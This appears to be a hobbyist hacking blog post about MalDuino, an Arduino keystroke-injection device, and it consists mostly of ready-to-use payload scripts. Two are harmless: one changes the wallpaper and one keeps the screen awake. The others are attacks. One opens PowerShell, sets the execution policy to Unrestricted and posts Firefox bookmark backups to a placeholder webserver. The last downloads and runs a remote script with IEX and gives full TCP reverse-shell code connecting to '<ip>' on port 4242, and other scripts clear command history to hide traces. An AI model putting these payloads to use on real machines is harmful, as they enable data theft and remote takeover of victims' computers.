Cover Image

MalDuino
 January 27, 2022    Hacking

MalDuino is a microcontroller that emulates a keyboard to inject commands. It is an Arduino-powered alternative to the original rubber ducky from hack5.


Change desktop background image (Windows 10)

Github

DELAY 100000
GUI r
DELAY 1000
STRING powershell.exe
ENTER
DELAY 1000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER 
DELAY 1000
STRING $url = "<wallpaper url>"
ENTER 
DELAY 1000
STRING cd ~
ENTER 
DELAY 1000
STRING cd Desktop
ENTER 
DELAY 1000
STRING $wc = New-Object System.Net.WebClient
ENTER 
DELAY 1000
STRING $currentPicture = "$(Pwd)\bg.jpg"
ENTER 
DELAY 1000
STRING $wc.DownloadFile($url, $currentPicture)
ENTER 
DELAY 1000
STRING set-itemproperty -path "HKCU:Control Panel\Desktop" -name WallPaper "$currentPicture"
ENTER 
DELAY 1000
STRING RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True
ENTER 
DELAY 1000
STRING Clear-History
ENTER 
DELAY 1000
STRING exit
ENTER


Keep device awake 1 hour

Github

DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI


Send Firefox bookmarks to a webserver (Windows 10)

Github

DELAY 100000
GUI r
DELAY 1000
STRING powershell.exe
ENTER
DELAY 1000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER 
DELAY 1000
STRING $app = $env:APPDATA
ENTER
DELAY 1000
STRING $uri=<webserver>
ENTER
DELAY 1000
STRING $dir = $app + "\Mozilla\Firefox\Profiles\*.dev-edition-default\bookmarkbackups"
ENTER
DELAY 1000
STRING Set-Location $dir
ENTER
DELAY 1000
STRING $latest = Get-ChildItem | Sort-Object LastAccessTime -Descending | Select-Object -First 1
ENTER
DELAY 1000
STRING Invoke-RestMethod -Uri $uri -Method Post -InFile $latest.FullName


Reverse Shell (Windows 10)

Github

DELAY 1000
GUI r
DELAY 100
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://<webserver>/ServerScript.ps1');"
ENTER
ServerScript.ps1
#From https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell 
#Shell nc64.exe -l -p 4242

$client = New-Object System.Net.Sockets.TCPClient('<ip>',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('<ip>',4242)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}